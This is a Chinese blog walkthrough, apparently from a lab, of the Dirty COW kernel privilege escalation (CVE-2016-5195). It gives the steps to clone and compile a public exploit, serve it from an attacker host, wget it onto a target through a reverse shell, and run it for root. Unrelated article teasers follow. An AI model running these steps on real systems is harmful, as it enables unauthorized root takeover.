程序员经验分享-hwhale

Dirty cow提权(脏牛)CVE-2016-5195 演示

2023-10-29

漏洞原理(脏牛)

 Linux内核的内存子系统在处理写入时复制时产生了竞争条件(指的是任务执行顺序异常,导致应用崩溃或者使得攻击者利用其漏洞进一步执行其他代码,最终攻击者可对其目标进行提权获得root权限)

提权

下载EXP

┌──(root㉿kali)-[~]
└─# git clone https://github.com/firefart/dirtycow.git
┌──(root㉿kali)-[~]
└─# ls 
Desktop  dirtycow  Documents  Downloads  jdk1.8.0_202  Music  Pictures  Public  Templates  Video                         
┌──(root㉿kali)-[~]
└─# cd dirtycow                         
┌──(root㉿kali)-[~/dirtycow]
└─# ls
dirty.c  README.md

gcc编译

┌──(root㉿kali)-[~/dirtycow]
└─# gcc -pthread dirty.c -o dirty -lcrypt   #使用gcc编译 -o意思是生成dirty文件            
┌──(root㉿kali)-[~/dirtycow]
└─# ls
dirty  dirty.c  README.md

设置执行权限

┌──(root㉿kali)-[~/dirtycow]
└─# chmod +x dirty

本地开启web服务便于将本地编译好的dirty文件传到目标机中

┌──(root㉿kali)-[~/dirtycow]
└─# systemctl start apache2.service

通过反弹的Shell将攻击机编译的dirty下载到目标机

$ cd /tmp       
$ pwd
/tmp
$ wget http://10.10.10.128/dirty
--2022-10-21 03:02:29--  http://10.10.10.128/dirty
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17512 (17K)
Saving to: 'dirty'

     0K .......... .......                                    100% 51.0M=0s

2022-10-21 03:02:29 (51.0 MB/s) - 'dirty' saved [17512/17512]

$ ls
dirty

权限提升获取系统管理员权限和密码

$ ./dirty ggbond             # ./dirty+自定义密码  执行dirty完成提权获取系统登录信息
最后才是真正获取到系统后台权限
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Kali

提权

安全

Dirty cow提权(脏牛)

Dirty cow提权(脏牛)CVE-2016-5195 演示 的相关文章

  • ES6的迭代器与迭代协议Symbol.iterator

    前言 ES6新增了两个协议 可迭代协议 对象必须具有Symbol Iterator属性 属性值为一个函数 当这个对象被迭代时 就会调用该函数 返回一个迭代器 迭代器协议 描述了迭代器对象的具体规则 迭代器 迭代器 它是用于访问集合类的标准访

  • 如何解决pip更新问题.WARNING: You are using pip version 19.2.3, however version 19.3.1 is available.

    出现如图所示 当直接输入python m pip install upgrade pip更新还报错的时候 输入命令 python m pip install pip 结果如图所示 亲测有效

  • mysql注解参数_MySQL主从复制参数注解

    MySQL主从复制参数注解 master所有参数 1 log bin mysql bin 1 控制master的是否开启binlog记录功能 2 二进制文件最好放在单独的目录下 这不但方便优化 更方便维护 3 重新命名二进制日志很简单 只需

  • String的intern()方法浅析

    简介 String intern 方法是一种手动将字符串加入常量池中的native方法 原理如下 如果在当前类的常量池中存在与调用intern 方法的字符串等值的字符串 就直接返回常量池中相应字符串的引用 否则在常量池中复制一份该字符串 J

  • 连续不等_从“Jensen不等式”导出几个著名不等式

    常用的著名不等式 从Jensen不等式出发导出其他一些知名不等式 加权AG不等式 对 有 证明 记 因为对数函数为凸函数 使用加权琴生不等式 可得 Young不等式 若 则 证明 利用上述 加权AG不等式有 记 带入整理可得Young不等式

  • 2.2设备树的规范(dts和dtb)——DTB格式

    本节讲述设备树的dtb格式 上节讲述了dts格式 回顾上节 在dts文件和dtsi文件中 可以使用C语言的define和include 使用方法和作用也同C语言相同 编写dts文件后 需要使用dtc工具将dts文件编译成dtb文件 dtc工

随机推荐

  • Linux应用开发程序测试

    文章目录 前言 一 通过SDK开发应用程序 创建工程 将该工程的 elf 文件运行在我们搭建的Linux上 3 SDK调试 小总结 1 打开SDK 创建Linux应用程序工程 2 编写代码 3 编译代码 4 将可执行文件拷贝到开发板根文件系

  • Python,OpenCV应用轮廓逼近算法,检测对象的形状

    上一篇博客 我们学习了如何利用Python OpenCV计算轮廓的中心 这一节学习仅运用轮廓的基本属性来检测其形状 三角形 正方形 矩形 五边形 圆 1 利用轮廓逼近 将曲线上的点数减少为更简单的近似版本的过程 2 基于该轮廓逼近 检查每种

  • 自学网络安全,学习路线图必不可少,【282G】初级网络安全学习资源分享!

    前言 在自学网络安全的时候 我们总会遇到一些问题 我们可以在网上看到很多关于前端的这些问题 你们都是怎么学网络安全web前端的 零基础 怎么自学好网络安全 网络安全需要学多久 都学哪些知识 想成为一名合格的网络安全工程师 需要掌握哪些技能

  • SpringBoot第 6 讲:SpringBoot+jersey跨域文件上传

    一 创建Maven项目 参考 SpringBoot第 1 讲 HelloWorld 秦毅翔的专栏 CSDN博客 二 修改pom xm

  • 爬虫保存cookies时重要的两个参数(ignore_discard和ignore_expires)的作用

    代码如下 由于临时做的实例采用登录云打码平台的cookies import requests from lxml html import etree from fake useragent import UserAgent from htt

  • golang rpcx记录一次解决 context deadline exceeded的问题

    测试同时并发一万个应用去调用另一个微服务应用结果出现了上下文切换超时的问题 默认的超时时间只有一秒时间 程序在高并发的场景下很容易触发这个错误 最简单的解决办法就是把超时时间调大一点 以前设置的是一秒 现在调成五秒 另一种解决办法就是优化自

  • FHD、4K、8K为何物

    转自 http www 4k123 com thread 145 1 1 html 近段时间 分辨率是一个很热的话题 4K与8K两个词频繁曝光于各大行业网站 8月23日 联合国旗下的国际电讯联盟通过以日本NHK电视台所建议的7680x432

  • Springboot2.0快速入门(第一章)

    目录 一 SpringBoot简介 1 1 回顾什么是Spring 1 2 Spring是如何简化Java开发的 1 3 什么是SpringBoot 二 Hello World 2 1 准备工作 2 2 创建基础项目说明 2 3 创建第一个

  • CoreML模型分析

    准备工作 首先得有一个Xcode以及一个简单的添加了CoreMLFramework的工程 下载模型 如官方推荐的MobileNetV2 将模型导入到工程中 并添加到你的编译项目中 双击打开 会看到这么一个页面 5 然后点击 就可以进入到模型

  • rust核心语法

    一 强类型语言 自动判断定义的变量类型 let a 323 不可变整形变量 let mut a 323 可变整形变量 变量声明方式 let a u64 323 不声明会被默认 二 表达式 1 可以在一个用 包括的块里编写一个较为复杂的表达式

  • react-container-query

    1 媒体查询 响应式组件 2 使用方法 1 引入 import ContainerQuery from react container query 2 规定屏幕尺寸 媒体查询 const query screen xs maxWidth 5

  • mysql强制指定查询使用的索引

    语法 select from table name force index index name where conditions 例如 mysql强制使用指定索引查询 SELECT FROM yrd pay flow FORCE INDE

  • 图解Netty之Pipeline、channel、Context之间的数据流向。

    以下所绘制图形均基于Netty4 0 28版本 一 connect outbound类型事件 当用户调用channel的connect时 会发起一个outbound类型的事件 该事件将在pipeline中传递 pipeline connec

  • PAT 乙级 1035 插入与归并 (C语言)

    题目 根据维基百科的定义 插入排序是迭代算法 逐一获得输入数据 逐步产生有序的输出序列 每步迭代中 算法从输入序列中取出一元素 将之插入有序序列中正确的位置 如此迭代直到全部元素有序 归并排序进行如下迭代操作 首先将原始序列看成 N 个只包

  • SetupSTM32CubeProgrammer安装教程

    SetupSTM32CubeProgrammer安装教程 下载地址 ST官方网站 链接 link https www st com en development tools stm32cubeprog html 环境准备 笔主是下载好就开始

  • Java 多线程共享模型之管程(上)

    主线程与守护线程 默认情况下 Java 进程需要等待所有线程都运行结束 才会结束 有一种特殊的线程叫做守护线程 只要其它非守护线程运行结束了 即使守护线程的代码没有执行完 也会强制结束 package Daemon import lombo

  • 系统分析师案例题【数据库篇】

    目录 1 规范化与反规范化 1 1 数据库设计过程 1 2 范式 1 3 反规范化 2 数据库索引 3 数据库视图 4 分区分表分库 5 分布式数据库系统 6 NoSQL 7 联邦数据库系统 8 数据库的性能优化 9 大数据 1 规范化与反

  • Java之网络编程

    文章目录 1 B S和C S架构 1 1B S架构 1 2C S架构 2 http协议 2 1http协议的特点 2 2http请求格式 2 3http响应格式 3 UDP协议 4 TCP协议 DNS域名解析 6 socket 6 1Ine

  • 问题:pycharm里面调用mysql失败

    项目场景 pycharm调用mysql的时候 连接数据库错误 排除密码 账户 语句等常规错误 问题 Could not connect server may not be running import pymysql 建立数据库连接 con

  • Dirty cow提权(脏牛)CVE-2016-5195 演示

    漏洞原理 脏牛 Linux内核的内存子系统在处理写入时复制时产生了竞争条件 指的是任务执行顺序异常 导致应用崩溃或者使得攻击者利用其漏洞进一步执行其他代码 最终攻击者可对其目标进行提权获得root权限 提权 下载EXP root kali

热门标签